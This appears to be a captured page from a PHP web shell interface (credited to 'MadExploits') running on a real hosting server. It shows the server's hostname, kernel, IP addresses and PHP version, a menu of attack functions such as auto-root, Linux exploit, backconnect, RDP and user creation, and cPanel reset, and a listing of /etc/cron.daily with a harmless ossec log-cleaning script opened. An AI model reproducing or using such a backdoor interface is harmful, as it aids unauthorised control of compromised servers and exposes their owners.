Linux eyewebsolution.dnshostserver.in 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
Apache
: 185.131.55.234 | : 216.73.216.138
676 Domain
5.6.40
omxrelocation
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
cron.daily /
[ HOME SHELL ]
Name
Size
Permission
Action
cloudlinux-backup-utils
801
B
-rwxr-xr-x
csget
3.24
KB
-rwx------
imunify-antivirus.cron
1.71
KB
-rwxr-xr-x
imunify-realtime-av-fchange-up...
244
B
-rwxr-xr-x
imunify360.cron
1.72
KB
-rwxr-xr-x
logrotate
258
B
-rwx------
maldet
3.71
KB
-rwxr-xr-x
man-db.cron
618
B
-rwxr-xr-x
ossec_logs_cleaner
427
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ossec_logs_cleaner
#!/bin/bash # -delete option implicitly uses -depth, which traverse folders with DFS # (beginning with folder's content, ending with folder itself) # so, if old folder contains old files, "directory is not empty" error won't happen. # Old folder may not be deleted only if contains recently modified files find -H /var/ossec/logs/{alerts/*,archives/*,firewall/*} -mtime +2 -not -name alerts.json -delete >/dev/null 2>&1 exit 0
Close